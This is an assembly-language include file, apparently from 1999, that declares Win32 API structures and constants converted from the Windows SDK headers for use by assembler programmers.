CONTEXT_SegDs DD ?
CONTEXT_Edi DD ?
CONTEXT_Esi DD ?
CONTEXT_Ebx DD ?
CONTEXT_Edx DD ?
CONTEXT_Ecx DD ?
CONTEXT_Eax DD ?
CONTEXT_Ebp DD ?
CONTEXT_Eip DD ?
CONTEXT_SegCs DD ?
CONTEXT_EFlags DD ?
CONTEXT_Esp DD ?
CONTEXT_SegSs DD ?
CONTEXT ENDS
EXCEPTION_RECORD STRUC
ER_ExceptionCode DD ?
ER_ExceptionFlags DD ?
ER_ExceptionRecord DD EXCEPTION_RECORD PTR ?
ER_ExceptionAddress DD BYTE PTR ?
ER_NumberParameters DD ?
ER_ExceptionInformation DD EXCEPTION_MAXIMUM_PARAMETERS DUP(?)
EXCEPTION_RECORD ENDS
EXCEPTION_POINTERS STRUC ;
EP_ExceptionRecord DD EXCEPTION_RECORD PTR ? ; pointer to exception rec
EP_ContextRecord DD CONTEXT PTR ? ; pointer to a context
EXCEPTION_POINTERS ENDS ;
MEMORY_BASIC_INFORMATION STRUC ;
MBI_BaseAddress DD BYTE PTR ? ;
MBI_AllocationBase DD BYTE PTR ? ;
MBI_AllocationProtect DD ? ;
MBI_RegionSize DD ? ;
MBI_State DD ? ;
MBI_Protect DD ? ;
MBI_Type DD ? ;
MEMORY_BASIC_INFORMATION ENDS ;
FILE_NOTIFY_INFORMATION STRUC ;
FNI_NextEntryOffset DD ? ;
FNI_Action DD ? ;
FNI_FileNameLength DD ? ;
FNI_FileName DB 1 DUP(?) ;
FILE_NOTIFY_INFORMATION ENDS ;
MESSAGE_RESOURCE_ENTRY STRUC ;
MRE_Length DW ? ;
MRE_Flags DW ? ;
MRE_Text DB 1 DUP(?) ;
MESSAGE_RESOURCE_ENTRY ENDS ;
MESSAGE_RESOURCE_BLOCK STRUC ;
MRB_LowId DD ? ;
MRB_HighId DD ? ;
MRB_OffsetToEntries DD ? ;
MESSAGE_RESOURCE_BLOCK ENDS ;
MESSAGE_RESOURCE_DATA STRUC ;
MRD_NumberOfBlocks DD ? ;
MRD_Blocks MESSAGE_RESOURCE_BLOCK 1 DUP(?) ;
MESSAGE_RESOURCE_DATA ENDS ;
EVENTLOGRECORD STRUC
ELR_Length DD ? ; Length of full record
ELR_Reserved DD ? ; Used by the service
ELR_RecordNumber DD ? ; Absolute record number
ELR_TimeGenerated DD ? ; Seconds since 1-1-1970
ELR_TimeWritten DD ? ; Seconds since 1-1-1970
ELR_EventID DD ? ;
ELR_EventType DW ? ;
ELR_NumStrings DW ? ;
ELR_EventCategory DW ? ;
ELR_ReservedFlags DW ? ; For use with paired events (auditing)
ELR_ClosingRecordNumber DD ? ; For use with paired events (auditing)
ELR_StringOffset DD ? ; Offset from beginning of record
ELR_UserSidLength DD ? ;
ELR_UserSidOffset DD ? ;
ELR_DataLength DD ? ;
ELR_DataOffset DD ? ; Offset from beginning of record
EVENTLOGRECORD ENDS ;
OVERLAPPED STRUC ;
O_Internal DD ? ;
O_InternalHigh DD ? ;
O_Offset DD ? ;
O_OffsetHigh DD ? ;
O_hEvent DD ? ;
OVERLAPPED ENDS ;
SECURITY_ATTRIBUTES STRUC ;
SA_nLength DD ? ;
SA_lpSecurityDescriptor DD BYTE PTR ? ;
SA_bInheritHandle DB ? ;
SECURITY_ATTRIBUTES ENDS ;
PROCESS_INFORMATION STRUC ;
PI_hProcess DD ? ;
PI_hThread DD ? ;
PI_dwProcessId DD ? ;
PI_dwThreadId DD ? ;
PROCESS_INFORMATION ENDS ;
FILETIME STRUC ;
FT_dwLowDateTime DD ? ;
FT_dwHighDateTime DD ? ;
FILETIME ENDS ;
SYSTEMTIME STRUC ;
ST_wYear DW ? ;
ST_wMonth DW ? ;
ST_wDayOfWeek DW ? ;
ST_wDay DW ? ;
ST_wHour DW ? ;
ST_wMinute DW ? ;
ST_wSecond DW ? ;
ST_wMilliseconds DW ? ;
SYSTEMTIME ENDS ;
SYSTEM_INFO STRUC ;
UNION ;
SI_dwOemId DW ? ; Obsolete field...do not use
STRUC ;
SI_wProcessorArchitecture DW ? ;
SI_wReserved DW ? ;
ENDS ;
ENDS ;
SI_dwPageSize DD ? ;
SI_lpMinimumApplicationAddress DD BYTE PTR ?
SI_lpMaximumApplicationAddress DD BYTE PTR ?
SI_dwActiveProcessorMask DD ? ;
SI_dwNumberOfProcessors DD ? ;
SI_dwProcessorType DD ? ;
SI_dwAllocationGranularity DD ? ;
SI_wProcessorLevel DW ? ;
SI_wProcessorRevision DW ? ;
SYSTEM_INFO ENDS ;
MEMORYSTATUS STRUC ;
MS_dwLength DD ? ;
MS_dwMemoryLoad DD ? ;
MS_dwTotalPhys DD ? ;
MS_dwAvailPhys DD ? ;
MS_dwTotalPageFile DD ? ;
MS_dwAvailPageFile DD ? ;
MS_dwTotalVirtual DD ? ;
MS_dwAvailVirtual DD ? ;
MEMORYSTATUS ENDS ;
EXCEPTION_DEBUG_INFO STRUC ;
EDI_ExceptionRecord EXCEPTION_RECORD ? ;
EDI_dwFirstChance DD ? ;
EXCEPTION_DEBUG_INFO ENDS ;
CREATE_THREAD_DEBUG_INFO STRUC ;
CTDI_hThread DD ? ;
CTDI_lpThreadLocalBase DD BYTE PTR ? ;
CTDI_lpStartAddress DD BYTE PTR THREAD_START_ROUTINE
CREATE_THREAD_DEBUG_INFO ENDS ;
CREATE_PROCESS_DEBUG_INFO STRUC ;
CPDI_hFile DD ? ;
CPDI_hProcess DD ? ;
CPDI_hThread DD ? ;
CPDI_lpBaseOfImage DD BYTE PTR ? ;
CPDI_dwDebugInfoFileOffset DD ? ;
CPDI_nDebugInfoSize DD ? ;
CPDI_lpThreadLocalBase DD BYTE PTR ? ;
CPDI_lpStartAddress DD BYTE PTR THREAD_START_ROUTINE
CPDI_lpImageName DD BYTE PTR ? ;
CPDI_fUnicode DW ? ;
CREATE_PROCESS_DEBUG_INFO ENDS ;
EXIT_THREAD_DEBUG_INFO STRUC ;
ETDI_dwExitCode DD ? ;
EXIT_THREAD_DEBUG_INFO ENDS ;
EXIT_PROCESS_DEBUG_INFO STRUC ;
EPDI_dwExitCode DD ? ;
EXIT_PROCESS_DEBUG_INFO ENDS ;
LOAD_DLL_DEBUG_INFO STRUC ;
LDDI_hFile DD ? ;
LDDI_lpBaseOfDll DD BYTE PTR ? ;
LDDI_dwDebugInfoFileOffset DD ? ;
LDDI_nDebugInfoSize DD ? ;
LDDI_lpImageName DD BYTE PTR ? ;
LDDI_fUnicode DW ? ;
LOAD_DLL_DEBUG_INFO ENDS ;
UNLOAD_DLL_DEBUG_INFO STRUC ;
UDDI_lpBaseOfDll DD BYTE PTR ? ;
UNLOAD_DLL_DEBUG_INFO ENDS ;
OUTPUT_DEBUG_STRING_INFO STRUC ;
ODSI_lpDebugStringData DD BYTE PTR ? ;
ODSI_fUnicode DW ? ;
ODSI_nDebugStringLength DW ? ;
OUTPUT_DEBUG_STRING_INFO ENDS ;
RIP_INFO STRUC
RIP_dwError dd ?
RIP_dwType dd ?
RIP_INFO ENDS
DEBUG_EVENT STRUC ;
DEV_dwDebugEventCode DD ? ;
DEV_dwProcessId DD ? ;
DEV_dwThreadId DD ? ;
UNION ;
DEV_Exception EXCEPTION_DEBUG_INFO ? ;
DEV_CreateThread CREATE_THREAD_DEBUG_INFO ? ;
DEV_CreateProcessInfo CREATE_PROCESS_DEBUG_INFO ? ;
DEV_ExitThread EXIT_THREAD_DEBUG_INFO ? ;
DEV_ExitProcess EXIT_PROCESS_DEBUG_INFO ? ;
DEV_LoadDll LOAD_DLL_DEBUG_INFO ? ;
DEV_UnloadDll UNLOAD_DLL_DEBUG_INFO ? ;
DEV_DebugString OUTPUT_DEBUG_STRING_INFO ? ;
DEV_RipInfo RIP_INFO ? ;
ENDS ;
DEBUG_EVENT ENDS ;
PROCESS_HEAP_ENTRY STRUC ;
lpData DD BYTE PTR ? ;
cbData DD ? ;
cbOverhead DB ? ;
iRegionIndex DB ? ;
wFlags DW ? ;
UNION ;
STRUC ;
hMem DD ? ;
dwReserved DD 3 DUP(?) ;
ENDS ;
STRUC ;
dwCommittedSize DD ? ;
dwUnCommittedSize DD ? ;
lpFirstBlock DD BYTE PTR ? ;
lpLastBlock DD BYTE PTR ? ;
ENDS ;
ENDS ;
PROCESS_HEAP_ENTRY ENDS ;
STARTUPINFO STRUC ;
STI_cb DD ? ;
STI_lpReserved DD BYTE PTR ? ;
STI_lpDesktop DD BYTE PTR ? ;
STI_lpTitle DD BYTE PTR ? ;
STI_dwX DD ? ;
STI_dwY DD ? ;
STI_dwXSize DD ? ;
STI_dwYSize DD ? ;
STI_dwXCountChars DD ? ;
STI_dwYCountChars DD ? ;
STI_dwFillAttribute DD ? ;
STI_dwFlags DD ? ;
STI_wShowWindow DW ? ;
STI_cbReserved2 DW ? ;
STI_lpReserved2 DD BYTE PTR ? ;
STI_hStdInput DD ? ;
STI_hStdOutput DD ? ;
STI_hStdError DD ? ;
STARTUPINFO ENDS ;
WIN32_FIND_DATA STRUC ;
WFD_dwFileAttributes DD ? ;
WFD_ftCreationTime FILETIME ? ;
WFD_ftLastAccessTime FILETIME ? ;
WFD_ftLastWriteTime FILETIME ? ;
WFD_nFileSizeHigh DD ? ;
WFD_nFileSizeLow DD ? ;
WFD_dwReserved0 DD ? ;
WFD_dwReserved1 DD ? ;
WFD_cFileName DB MAX_PATH DUP(?) ;
WFD_cAlternateFileName DB 14 DUP(?) ;
WIN32_FIND_DATA ENDS ;
WIN32_FILE_ATTRIBUTE_DATA STRUC ;
WFAD_dwFileAttributes DD ? ;
WFAD_ftCreationTime FILETIME ? ;
WFAD_ftLastAccessTime FILETIME ? ;
WFAD_ftLastWriteTime FILETIME ? ;
WFAD_nFileSizeHigh DD ? ;
WFAD_nFileSizeLow DD ? ;
WIN32_FILE_ATTRIBUTE_DATA ENDS ;
; Point
POINT struc
x DD ?
y DD ?
POINT ends
; Rectangle
RECT struc
rcLeft UINT ?
rcTop UINT ?
rcRight UINT ?
rcBottom UINT ?
RECT ends
WNDCLASS struc
clsStyle UINT ? ; class style
clsLpfnWndProc ULONG ?
clsCbClsExtra UINT ?
clsCbWndExtra UINT ?
clsHInstance UINT ? ; instance handle
clsHIcon UINT ? ; class icon handle
clsHCursor UINT ? ; class cursor handle
clsHbrBackground UINT ? ; class background brush
clsLpszMenuName ULONG ? ; menu name
clsLpszClassName ULONG ? ; far ptr to class name
WNDCLASS ends
STD_WINDOW STRUC
wcxSize dd ?
wcxStyle dd ?
wcxWndProc dd ?
wcxClsExtra dd ?
wcxWndExtra dd ?
wcxInstance dd ?
wcxIcon dd ?
wcxCursor dd ?
wcxBkgndBrush dd ?
wcxMenuName dd ?
wcxClassName dd ?
wcxSmallIcon dd ?
STD_WINDOW ENDS
PAINTSTRUCT STRUC
PShdc UINT ?
PSfErase UINT ?
PSrcPaint UCHAR size RECT dup(?)
PSfRestore UINT ?
PSfIncUpdate UINT ?
PSrgbReserved UCHAR 16 dup(?)
PAINTSTRUCT ENDS
MSGSTRUCT struc
msHWND UINT ?
msMESSAGE UINT ?
msWPARAM UINT ?
msLPARAM ULONG ?
msTIME ULONG ?
msPT ULONG ?
MSGSTRUCT ends
MINMAXINFO struc
res_x dd ?
res_y dd ?
maxsize_x dd ?
maxsize_y dd ?
maxposition_x dd ?
maxposition_y dd ?
mintrackposition_x dd ?
mintrackposition_y dd ?
maxtrackposition_x dd ?
maxtrackposition_y dd ?
MINMAXINFO ends
TEXTMETRIC struc
tmHeight dw ?
tmAscent dw ?
tmDescent dw ?
tmIntLeading dw ?
tmExtLeading dw ?
tmAveCharWidth dw ?
tmMaxCharWidth dw ?
tmWeight dw ?
tmItalic db ?
tmUnderlined db ?
tmStruckOut db ?
tmFirstChar db ?
tmLastChar db ?
tmDefaultChar db ?
tmBreakChar db ?
tmPitch db ?
tmCharSet db ?
tmOverhang dw ?
tmAspectX dw ?
tmAspectY dw ?
TEXTMETRIC ends
LF_FACESIZE EQU 32
LOGFONT struc
lfHeight dw ?
lfWidth dw ?
lfEscapement dw ?
lfOrientation dw ?
lfWeight dw ?
lfItalic db ?
lfUnderline db ?
lfStrikeOut db ?
lfCharSet db ?
lfOutPrecision db ?
lfClipPrecision db ?
lfQuality db ?
lfPitchAndFamily db ?
lfFaceName db LF_FACESIZE dup(?)
LOGFONT ends
LOGBRUSH struc
lbStyle dw ?
lbColor dd ?
lbHatch dw ?
LOGBRUSH ends
TRANSPARENT = 1
OPAQUE = 2
; Mapping Modes
MM_TEXT = 1
MM_LOMETRIC = 2
MM_HIMETRIC = 3
MM_LOENGLISH = 4
MM_HIENGLISH = 5
MM_TWIPS = 6
MM_ISOTROPIC = 7
MM_ANISOTROPIC = 8
; Coordinate Modes
ABSOLUTE = 1
RELATIVE = 2
WHITE_BRUSH = 0
LTGRAY_BRUSH = 1
GRAY_BRUSH = 2
DKGRAY_BRUSH = 3
BLACK_BRUSH = 4
NULL_BRUSH = 5
HOLLOW_BRUSH = 5
WHITE_PEN = 6
BLACK_PEN = 7
NULL_PEN = 8
DOT_MARKER = 9
OEM_FIXED_FONT = 10
ANSI_FIXED_FONT = 11
ANSI_VAR_FONT = 12
SYSTEM_FONT = 13
DEVICE_DEFAULT_FONT = 14
DEFAULT_PALETTE = 15
SYSTEM_FIXED_FONT = 16
; Brush Styles
BS_SOLID = 0
BS_NULL = 1
BS_HOLLOW = BS_NULL
BS_HATCHED = 2
BS_PATTERN = 3
BS_INDEXED = 4
BS_DIBPATTERN = 5
; Hatch Styles
HS_HORIZONTAL = 0 ; -----
HS_VERTICAL = 1 ; |||||
HS_FDIAGONAL = 2 ; \\\\\
HS_BDIAGONAL = 3 ; /////
HS_CROSS = 4 ; +++++
HS_DIAGCROSS = 5 ; xxxxx
; Pen Styles
PS_SOLID = 0
PS_DASH = 1 ; -------
PS_DOT = 2 ; .......
PS_DASHDOT = 3 ; _._._._
PS_DASHDOTDOT = 4 ; _.._.._
PS_NULL = 5
PS_INSIDEFRAME = 6
; Device Technologies
DT_PLOTTER = 0 ; Vector plotter
DT_RASDISPLAY = 1 ; Raster display
DT_RASPRINTER = 2 ; Raster printer
DT_RASCAMERA = 3 ; Raster camera
DT_CHARSTREAM = 4 ; Character-stream, PLP
DT_METAFILE = 5 ; Metafile, VDM
DT_DISPFILE = 6 ; Display-file
; Curve Capabilities
; Line Capabilities
; Polygonal Capabilities
; Polygonal Capabilities
; Text Capabilities
; Raster Capabilities
SYSPAL_STATIC = 1
SYSPAL_NOSTATIC = 2
BI_RGB = 0
BI_RLE8 = 1
BI_RLE4 = 2
ANSI_CHARSET = 0
SYMBOL_CHARSET = 2
OEM_CHARSET = 255
RGN_AND = 1
RGN_OR = 2
RGN_XOR = 3
RGN_DIFF = 4
RGN_COPY = 5
┌──────────────────────────────────────────────────────────────────────────┐
└──────────────────────────────────────────────────────────────────────────┘
┌─┐                                                                      ┌─┐
│ │ This is my transformation of the original WINUSER.H                  │ │
│ │ file from the Microsoft Windows SDK(C) for Windows NT 5.0            │ │
│ │ beta 2 and Windows 98, released in Sept. 1998.                       │ │
│ │ This file was transformed by me from the original C                  │ │
│ │ definition into assembly language. You can use this file to          │ │
│ │ quicken up writing your win32 programs in assembler. You             │ │
│ │ can use these files as you wish, as they are freeware.               │ │
│ │                                                                      │ │
│ │ However, if you find any mistake inside this file,                   │ │
│ │ it is probably due to the fact that I merely could see the           │ │
│ │ monitor while converting the files. So, if you do notice             │ │
│ │ something, please notify me on my e-mail address at:                 │ │
│ │                                                                      │ │
│ │ lordjulus@geocities.com                                              │ │
│ │                                                                      │ │
│ │ Also, if you find any other useful stuff that can be                 │ │
│ │ included here, do not hesitate to tell me.                           │ │
│ │                                                                      │ │
│ │ Good luck,                                                           │ │
│ │ ┌───────────────────────┐                                            │ │
│ │ │ Lord Julus (c) 1999   │                                            │ │
│ │ └───────────────────────┘                                            │ │
│ │                                                                      │ │
└─┘                                                                      └─┘
┌──────────────────────────────────────────────────────────────────────────┐
└──────────────────────────────────────────────────────────────────────────┘
NETRESOURCEA STRUC
dwScope DD 0
dwType DD 0
dwDisplayType DD 0
dwUsage DD 0
lpLocalName DD 0
lpRemoteName DD 0
lpComment DD 0
lpProvider DD 0
NETRESOURCEA ENDS
;---
RT_CURSOR EQU 1
RT_BITMAP EQU 2
RT_ICON EQU 3
RT_MENU EQU 4
RT_DIALOG EQU 5
RT_STRING EQU 6
RT_FONTDIR EQU 7
RT_FONT EQU 8
RT_ACCELERATOR EQU 9
RT_RCDATA EQU 10
RT_MESSAGETABLE EQU 11
DIFFERENCE EQU 11
RT_GROUP_CURSOR EQU RT_CURSOR + DIFFERENCE
RT_GROUP_ICON EQU RT_ICON + DIFFERENCE
RT_VERSION EQU 16
RT_DLGINCLUDE EQU 17
RT_PLUGPLAY EQU 19
RT_VXD EQU 20
RT_ANICURSOR EQU 21
RT_ANIICON EQU 22
RT_HTML EQU 23
SB_HORZ EQU 0
SB_VERT EQU 1
SB_CTL EQU 2
SB_BOTH EQU 3
SB_LINEUP EQU 0
SB_LINELEFT EQU 0
SB_LINEDOWN EQU 1
SB_LINERIGHT EQU 1
SB_PAGEUP EQU 2
SB_PAGELEFT EQU 2
SB_PAGEDOWN EQU 3
SB_PAGERIGHT EQU 3
SB_THUMBPOSITION EQU 4
SB_THUMBTRACK EQU 5
SB_TOP EQU 6
SB_LEFT EQU 6
SB_BOTTOM EQU 7
SB_RIGHT EQU 7
SB_ENDSCROLL EQU 8
; ShowWindow() Commands
SW_HIDE EQU 0
SW_SHOWNORMAL EQU 1
SW_NORMAL EQU 1
SW_SHOWMINIMIZED EQU 2
SW_SHOWMAXIMIZED EQU 3
SW_MAXIMIZE EQU 3
SW_SHOWNOACTIVATE EQU 4
SW_SHOW EQU 5
SW_MINIMIZE EQU 6
SW_SHOWMINNOACTIVE EQU 7
SW_SHOWNA EQU 8
SW_RESTORE EQU 9
SW_SHOWDEFAULT EQU 10
SW_FORCEMINIMIZE EQU 11
SW_MAX EQU 11
HIDE_WINDOW EQU 0
SHOW_OPENWINDOW EQU 1
SHOW_ICONWINDOW EQU 2
SHOW_FULLSCREEN EQU 3
SHOW_OPENNOACTIVATE EQU 4
SW_PARENTCLOSING EQU 1
SW_OTHERZOOM EQU 2
SW_PARENTOPENING EQU 3
SW_OTHERUNZOOM EQU 4
; AnimateWindow() Commands
; SetWindowsHook() codes
WH_MIN EQU -1
WH_MSGFILTER EQU -1
WH_JOURNALRECORD EQU 0
WH_JOURNALPLAYBACK EQU 1
WH_KEYBOARD EQU 2
WH_GETMESSAGE EQU 3
WH_CALLWNDPROC EQU 4
WH_CBT EQU 5
WH_SYSMSGFILTER EQU 6
WH_MOUSE EQU 7
WH_HARDWARE EQU 8
WH_DEBUG EQU 9
WH_SHELL EQU 10
WH_FOREGROUNDIDLE EQU 11
WH_CALLWNDPROCRET EQU 12
WH_KEYBOARD_LL EQU 13
WH_MOUSE_LL EQU 14
WH_MAX EQU 14
; Hook Codes
HC_ACTION EQU 0
HC_GETNEXT EQU 1
HC_SKIP EQU 2
HC_NOREMOVE EQU 3
HC_NOREM EQU HC_NOREMOVE
HC_SYSMODALON EQU 4
HC_SYSMODALOFF EQU 5
HCBT_MOVESIZE EQU 0
HCBT_MINMAX EQU 1
HCBT_QS EQU 2
HCBT_CREATEWND EQU 3
HCBT_DESTROYWND EQU 4
HCBT_ACTIVATE EQU 5
HCBT_CLICKSKIPPED EQU 6
HCBT_KEYSKIPPED EQU 7
HCBT_SYSCOMMAND EQU 8
HCBT_SETFOCUS EQU 9
MSGF_DIALOGBOX EQU 0
MSGF_MESSAGEBOX EQU 1
MSGF_MENU EQU 2
MSGF_SCROLLBAR EQU 5
MSGF_NEXTWINDOW EQU 6
MSGF_MAX EQU 8 ; unused
MSGF_USER EQU 4096
; Shell support
HSHELL_WINDOWCREATED EQU 1
HSHELL_WINDOWDESTROYED EQU 2
HSHELL_ACTIVATESHELLWINDOW EQU 3
HSHELL_WINDOWACTIVATED EQU 4
HSHELL_GETMINRECT EQU 5
HSHELL_REDRAW EQU 6
HSHELL_TASKMAN EQU 7
HSHELL_LANGUAGE EQU 8
HSHELL_ACCESSIBILITYSTATE EQU 11
ACCESS_STICKYKEYS EQU 0001h
ACCESS_FILTERKEYS EQU 0002h
ACCESS_MOUSEKEYS EQU 0003h
HKL_PREV EQU 0
HKL_NEXT EQU 1
KL_NAMELENGTH EQU 9
GMMP_USE_DISPLAY_POINTS EQU 1
GMMP_USE_HIGH_RESOLUTION_POINTS EQU 2
GWL_WNDPROC EQU -4
GWL_HINSTANCE EQU -6
GWL_HWNDPARENT EQU -8
GWL_STYLE EQU -16
GWL_EXSTYLE EQU -20
GWL_USERDATA EQU -21
GWL_ID EQU -12
GCL_MENUNAME EQU -8
GCL_HBRBACKGROUND EQU -10
GCL_HCURSOR EQU -12
GCL_HICON EQU -14
GCL_HMODULE EQU -16
GCL_CBWNDEXTRA EQU -18
GCL_CBCLSEXTRA EQU -20
GCL_WNDPROC EQU -24
GCL_STYLE EQU -26
GCW_ATOM EQU -32
GCL_HICONSM EQU -34
WA_INACTIVE EQU 0
WA_ACTIVE EQU 1
WA_CLICKACTIVE EQU 2
; Window Messages
WMSZ_LEFT EQU 1
WMSZ_RIGHT EQU 2
WMSZ_TOP EQU 3
WMSZ_TOPLEFT EQU 4
WMSZ_TOPRIGHT EQU 5
WMSZ_BOTTOM EQU 6
WMSZ_BOTTOMLEFT EQU 7
WMSZ_BOTTOMRIGHT EQU 8
PWR_OK EQU 1
PWR_FAIL EQU -1
PWR_SUSPENDREQUEST EQU 1
PWR_SUSPENDRESUME EQU 2
PWR_CRITICALRESUME EQU 3
NFR_ANSI EQU 1
NFR_UNICODE EQU 2
NF_QUERY EQU 3
NF_REQUERY EQU 4
; LOWORD(wParam) in WM_KEYBOARDCUES
KC_SHOW EQU 1
KC_HIDE EQU 2
KC_QUERY EQU 3
; HIWORD(wParam) in WM_KEYBOARDCUES
KCF_FOCUS EQU 1
KCF_ACCEL EQU 2
;MOUSEHOOKSTRUCT STRUC
; pt POINT <?>
; mh_hwnd DD ?
; wHitTestCode DD ?
; dwExtraInfo DD ?
;MOUSEHOOKSTRUCT ENDS
HTERROR EQU -2
HTTRANSPARENT EQU -1
HTNOWHERE EQU 0
HTCLIENT EQU 1
HTCAPTION EQU 2
HTSYSMENU EQU 3
HTGROWBOX EQU 4
HTSIZE EQU HTGROWBOX
HTMENU EQU 5
HTHSCROLL EQU 6
HTVSCROLL EQU 7
HTMINBUTTON EQU 8
HTMAXBUTTON EQU 9
HTLEFT EQU 10
HTRIGHT EQU 11
HTTOP EQU 12
HTTOPLEFT EQU 13
HTTOPRIGHT EQU 14
HTBOTTOM EQU 15
HTBOTTOMLEFT EQU 16
HTBOTTOMRIGHT EQU 17
HTBORDER EQU 18
HTREDUCE EQU HTMINBUTTON
HTZOOM EQU HTMAXBUTTON
HTSIZEFIRST EQU HTLEFT
HTSIZELAST EQU HTBOTTOMRIGHT
HTOBJECT EQU 19
HTCLOSE EQU 20
HTHELP EQU 21
; SendMessageTimeout values
MA_ACTIVATE EQU 1
MA_ACTIVATEANDEAT EQU 2
MA_NOACTIVATE EQU 3
MA_NOACTIVATEANDEAT EQU 4
ICON_SMALL EQU 0
ICON_BIG EQU 1
SIZE_RESTORED EQU 0
SIZE_MINIMIZED EQU 1
SIZE_MAXIMIZED EQU 2
SIZE_MAXSHOW EQU 3
SIZE_MAXHIDE EQU 4
; Window styles
; Class styles
;WM_PRINT flags
; 3D border styles
; Border flags
; For diagonal lines, the BF_RECT flags specify the end point of the
; vector bounded by the rectangle parameter.
DFC_CAPTION EQU 1
DFC_MENU EQU 2
DFC_SCROLL EQU 3
DFC_BUTTON EQU 4
DFC_POPUPMENU EQU 5
DFCS_CAPTIONCLOSE EQU 0000h
DFCS_CAPTIONMIN EQU 0001h
DFCS_CAPTIONMAX EQU 0002h
DFCS_CAPTIONRESTORE EQU 0003h
DFCS_CAPTIONHELP EQU 0004h
DFCS_MENUARROW EQU 0000h
DFCS_MENUCHECK EQU 0001h
DFCS_MENUBULLET EQU 0002h
DFCS_MENUARROWRIGHT EQU 0004h
DFCS_SCROLLUP EQU 0000h
DFCS_SCROLLDOWN EQU 0001h
DFCS_SCROLLLEFT EQU 0002h
DFCS_SCROLLRIGHT EQU 0003h
DFCS_SCROLLCOMBOBOX EQU 0005h
DFCS_SCROLLSIZEGRIP EQU 0008h
DFCS_SCROLLSIZEGRIPRIGHT EQU 0010h
DFCS_BUTTONCHECK EQU 0000h
DFCS_BUTTONRADIOIMAGE EQU 0001h
DFCS_BUTTONRADIOMASK EQU 0002h
DFCS_BUTTONRADIO EQU 0004h
DFCS_BUTTON3STATE EQU 0008h
DFCS_BUTTONPUSH EQU 0010h
DFCS_INACTIVE EQU 0100h
DFCS_PUSHED EQU 0200h
DFCS_CHECKED EQU 0400h
DFCS_TRANSPARENT EQU 0800h
DFCS_HOT EQU 1000h
DFCS_ADJUSTRECT EQU 2000h
DFCS_FLAT EQU 4000h
DFCS_MONO EQU 8000h
CF_TEXT EQU 1
CF_BITMAP EQU 2
CF_METAFILEPICT EQU 3
CF_SYLK EQU 4
CF_DIF EQU 5
CF_TIFF EQU 6
CF_OEMTEXT EQU 7
CF_DIB EQU 8
CF_PALETTE EQU 9
CF_PENDATA EQU 10
CF_RIFF EQU 11
CF_WAVE EQU 12
CF_UNICODETEXT EQU 13
CF_ENHMETAFILE EQU 14
CF_HDROP EQU 15
CF_LOCALE EQU 16
CF_DIBV5 EQU 17
CF_MAX EQU 18
CF_OWNERDISPLAY EQU 0080h
CF_DSPTEXT EQU 0081h
CF_DSPBITMAP EQU 0082h
CF_DSPMETAFILEPICT EQU 0083h
CF_DSPENHMETAFILE EQU 008Eh
CF_PRIVATEFIRST EQU 0200h
CF_PRIVATELAST EQU 02FFh
CF_GDIOBJFIRST EQU 0300h
CF_GDIOBJLAST EQU 03FFh
; PeekMessage() Options
; RegisterDeviceNotification
FLASHW_STOP EQU 0
FLASHW_CAPTION EQU 00000001h
FLASHW_TRAY EQU 00000002h
FLASHW_ALL EQU (FLASHW_CAPTION OR FLASHW_TRAY)
FLASHW_TIMER EQU 00000004h
FLASHW_TIMERNOFG EQU 0000000Ch
; SetWindowPos Flags
HWND_TOP EQU 0
HWND_BOTTOM EQU 1
HWND_TOPMOST EQU -1
HWND_NOTOPMOST EQU -2
INPUT_MOUSE EQU 0
INPUT_KEYBOARD EQU 1
INPUT_HARDWARE EQU 2
; TBBUTTON
TBBUTTON struc
iBitmap UINT ?
idCommand UINT ?
fsState UCHAR ?
fsStyle UCHAR ?
bReserved db 2 dup(?)
dwData ULONG ?
iString UINT ?
TBBUTTON ends
; GetSystemMetrics() codes
SM_CXSCREEN EQU 0
SM_CYSCREEN EQU 1
SM_CXVSCROLL EQU 2
SM_CYHSCROLL EQU 3
SM_CYCAPTION EQU 4
SM_CXBORDER EQU 5
SM_CYBORDER EQU 6
SM_CXDLGFRAME EQU 7
SM_CYDLGFRAME EQU 8
SM_CYVTHUMB EQU 9
SM_CXHTHUMB EQU 10
SM_CXICON EQU 11
SM_CYICON EQU 12
SM_CXCURSOR EQU 13
SM_CYCURSOR EQU 14
SM_CYMENU EQU 15
SM_CXFULLSCREEN EQU 16
SM_CYFULLSCREEN EQU 17
SM_CYKANJIWINDOW EQU 18
SM_MOUSEPRESENT EQU 19
SM_CYVSCROLL EQU 20
SM_CXHSCROLL EQU 21
SM_DEBUG EQU 22
SM_SWAPBUTTON EQU 23
SM_RESERVED1 EQU 24
SM_RESERVED2 EQU 25
SM_RESERVED3 EQU 26
SM_RESERVED4 EQU 27
SM_CXMIN EQU 28
SM_CYMIN EQU 29
SM_CXSIZE EQU 30
SM_CYSIZE EQU 31
SM_CXFRAME EQU 32
SM_CYFRAME EQU 33
SM_CXMINTRACK EQU 34
SM_CYMINTRACK EQU 35
SM_CXDOUBLECLK EQU 36
SM_CYDOUBLECLK EQU 37
SM_CXICONSPACING EQU 38
SM_CYICONSPACING EQU 39
SM_MENUDROPALIGNMENT EQU 40
SM_PENWINDOWS EQU 41
SM_DBCSENABLED EQU 42
SM_CMOUSEBUTTONS EQU 43
SM_CXFIXEDFRAME EQU SM_CXDLGFRAME ;win40 name change
SM_CYFIXEDFRAME EQU SM_CYDLGFRAME ;win40 name change
SM_CXSIZEFRAME EQU SM_CXFRAME ;win40 name change
SM_CYSIZEFRAME EQU SM_CYFRAME ;win40 name change
SM_SECURE EQU 44
SM_CXEDGE EQU 45
SM_CYEDGE EQU 46
SM_CXMINSPACING EQU 47
SM_CYMINSPACING EQU 48
SM_CXSMICON EQU 49
SM_CYSMICON EQU 50
SM_CYSMCAPTION EQU 51
SM_CXSMSIZE EQU 52
SM_CYSMSIZE EQU 53
SM_CXMENUSIZE EQU 54
SM_CYMENUSIZE EQU 55
SM_ARRANGE EQU 56
SM_CXMINIMIZED EQU 57
SM_CYMINIMIZED EQU 58
SM_CXMAXTRACK EQU 59
SM_CYMAXTRACK EQU 60
SM_CXMAXIMIZED EQU 61
SM_CYMAXIMIZED EQU 62
SM_NETWORK EQU 63
SM_CLEANBOOT EQU 67
SM_CXDRAG EQU 68
SM_CYDRAG EQU 69
SM_SHOWSOUNDS EQU 70
SM_CXMENUCHECK EQU 71 ; Use instead of GetMenuCheckMarkDimensions()!
SM_CYMENUCHECK EQU 72
SM_SLOWMACHINE EQU 73
SM_MIDEASTENABLED EQU 74
SM_MOUSEWHEELPRESENT EQU 75
SM_XVIRTUALSCREEN EQU 76
SM_YVIRTUALSCREEN EQU 77
SM_CXVIRTUALSCREEN EQU 78
SM_CYVIRTUALSCREEN EQU 79
SM_CMONITORS EQU 80
